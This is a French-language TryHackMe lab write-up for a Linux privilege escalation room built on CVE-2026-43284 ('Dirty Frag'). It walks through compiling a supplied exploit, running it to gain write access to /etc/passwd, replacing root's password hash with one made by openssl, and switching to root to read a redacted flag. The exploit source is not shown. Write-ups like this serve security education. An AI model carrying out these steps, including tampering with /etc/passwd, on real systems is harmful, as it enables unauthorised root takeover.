
TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup
Salle : CVE-2026-43284: Dirty Frag Catégorie : Élévation de privilèges Linux Auteur : (Ma page)
Dirty Frag est une room d'élévation de privilèges locale (LPE) Linux enchaînée, construite autour de CVE-2026-43284. L'objectif est de passer d'un shell non privilégié à root en exploitant un exploit de preuve de concept fourni.
Lister le répertoire de travail révèle les fichiers fournis pour l'exploit :
$ ls
README.txt
exp
exp.c
exp.c — le code source de l'exploitexp — un binaire précompilé (peut ne pas correspondre à l'environnement cible)README.txt — les notes d'utilisation fournies avec l'exploitLe binaire exp fourni n'étant peut-être pas compatible avec l'environnement exact de la cible, il est plus sûr de le reconstruire à partir des sources :
$ gcc -O0 -Wall -o exp exp.c -lutil
-O0 désactive les optimisations du compilateur, ce qui rend le comportement prévisible et conforme au code source-Wall active les avertissements du compilateur, utile pour vérifier la compilation-lutil lie libutil — généralement requis lorsque le code utilise des fonctions de pseudo-terminal (pty)$ ./exp
L'exécution de l'exploit compilé déclenche la faille sous-jacente, ce qui permet d'obtenir un accès en écriture à un fichier qui devrait normalement être en lecture seule pour les utilisateurs non privilégiés — en l'occurrence /etc/passwd.
Une fois l'accès en écriture obtenu, un nouveau hash de mot de passe pour root est généré :
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..
Ce hash est écrit dans /etc/passwd à la place du champ hash existant de root :
$ nano /etc/passwd
Le mot de passe de root étant maintenant connu, il est simple de changer d'utilisateur :
$ su root
$ cat /root/flag.txt
THM{REDACTED}
Ce write-up documente une room TryHackMe terminée à des fins éducatives. L'environnement cible est une machine intentionnellement vulnérable fournie par TryHackMe.